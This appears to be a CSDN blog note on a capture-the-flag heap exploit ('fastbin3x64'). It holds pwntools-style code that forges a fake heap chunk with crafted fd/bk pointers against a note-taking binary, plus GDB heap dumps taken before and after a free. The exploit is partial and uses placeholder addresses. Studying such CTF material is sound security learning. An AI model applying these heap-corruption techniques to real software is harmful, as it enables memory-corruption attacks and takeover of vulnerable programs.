fastbin3x64

最新推荐文章于 2022-05-20 20:02:22 发布

inquisiter

最新推荐文章于 2022-05-20 20:02:22 发布

阅读量211

点赞数

分类专栏： linux

本文链接：https://blog.csdn.net/bme314/article/details/78987307

版权

linux 专栏收录该内容

63 篇文章 6 订阅

订阅专栏

notelen = 0x80

#new_note("/bin/sh\x00"+"A"*(notelen-8))
new_note("A"*notelen)
new_note("B"*notelen)
new_note("C"*notelen)    

delete_note(2)
delete_note(1)
delete_note(0)

fd = 0x11111111 #notetable
bk = fd + 0x8


payload  = ""
payload += p64(0x0) + p64(notelen+1) + p64(fd) + p64(bk) + "A" * (notelen - 0x20)
payload += p64(notelen) + p64(notelen+0x10) + "A" * notelen
payload += p64(0) + p64(notelen+0x11)+ "\x00" * (notelen-0x20)

new_note(payload)  
list_note()
delete_note(1)


free_got = 0x602018

delete_note(1)之前

0x1e4d830:  0x00000000  0x00000000  0x00000081  0x00000000
0x1e4d840:  0x11111111  0x00000000  0x11111119  0x00000000
0x1e4d850:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d860:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d870:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d880:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d890:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d8a0:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d8b0:  0x00000080  0x00000000  0x00000090  0x00000000
0x1e4d8c0:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d8d0:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d8e0:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d8f0:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d900:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d910:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d920:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d930:  0x41414141  0x41414141  0x41414141  0x41414141
0x1e4d940:  0x00000000  0x00000000  0x00000091  0x00000000
0x1e4d950:  0x00000000  0x00000000  0x00000000  0x00000000
0x1e4d960:  0x00000000  0x00000000  0x00000000  0x00000000
0x1e4d970:  0x00000000  0x00000000  0x00000000  0x00000000
---Type <return> to continue, or q <return> to quit---
0x1e4d980:  0x00000000  0x00000000  0x00000000  0x00000000
0x1e4d990:  0x00000000  0x00000000  0x00000000  0x00000000
0x1e4d9a0:  0x00000000  0x00000000  0x00000000  0x00000000
0x1e4d9b0:  0x43434343  0x43434343  0x00020651  0x00000000
0x1e4d9c0:  0x43434343  0x43434343  0x43434343  0x43434343
0x1e4d9d0:  0x00000000  0x00000000  0x00020631  0x00000000
0x1e4d9e0:  0x00000000  0x00000000  0x00000000  0x00000000

delete_note(1)之后

0x2393820:  0x00000000  0x00000000  0x00000191  0x00000000
0x2393830:  0x00000000  0x00000000  0x00000081  0x00000000
0x2393840:  0x11111111  0x00000000  0x11111119  0x00000000
0x2393850:  0x41414141  0x41414141  0x41414141  0x41414141
0x2393860:  0x41414141  0x41414141  0x41414141  0x41414141
0x2393870:  0x41414141  0x41414141  0x41414141  0x41414141
0x2393880:  0x41414141  0x41414141  0x41414141  0x41414141
0x2393890:  0x41414141  0x41414141  0x41414141  0x41414141
0x23938a0:  0x41414141  0x41414141  0x41414141  0x41414141
0x23938b0:  0x00000080  0x00000000  0x00000090  0x00000000
0x23938c0:  0x41414141  0x41414141  0x41414141  0x41414141
0x23938d0:  0x41414141  0x41414141  0x41414141  0x41414141
0x23938e0:  0x41414141  0x41414141  0x41414141  0x41414141
0x23938f0:  0x41414141  0x41414141  0x41414141  0x41414141
0x2393900:  0x41414141  0x41414141  0x41414141  0x41414141
0x2393910:  0x41414141  0x41414141  0x41414141  0x41414141
0x2393920:  0x41414141  0x41414141  0x41414141  0x41414141
0x2393930:  0x41414141  0x41414141  0x41414141  0x41414141
0x2393940:  0x00000000  0x00000000  0x00000091  0x00000000
0x2393950:  0x00000000  0x00000000  0x00000000  0x00000000
0x2393960:  0x00000000  0x00000000  0x00000000  0x00000000
0x2393970:  0x00000000  0x00000000  0x00000000  0x00000000
---Type <return> to continue, or q <return> to quit---
0x2393980:  0x00000000  0x00000000  0x00000000  0x00000000
0x2393990:  0x00000000  0x00000000  0x00000000  0x00000000
0x23939a0:  0x00000000  0x00000000  0x00000000  0x00000000
0x23939b0:  0x43434343  0x43434343  0x00020651  0x00000000
0x23939c0:  0x43434343  0x43434343  0x43434343  0x43434343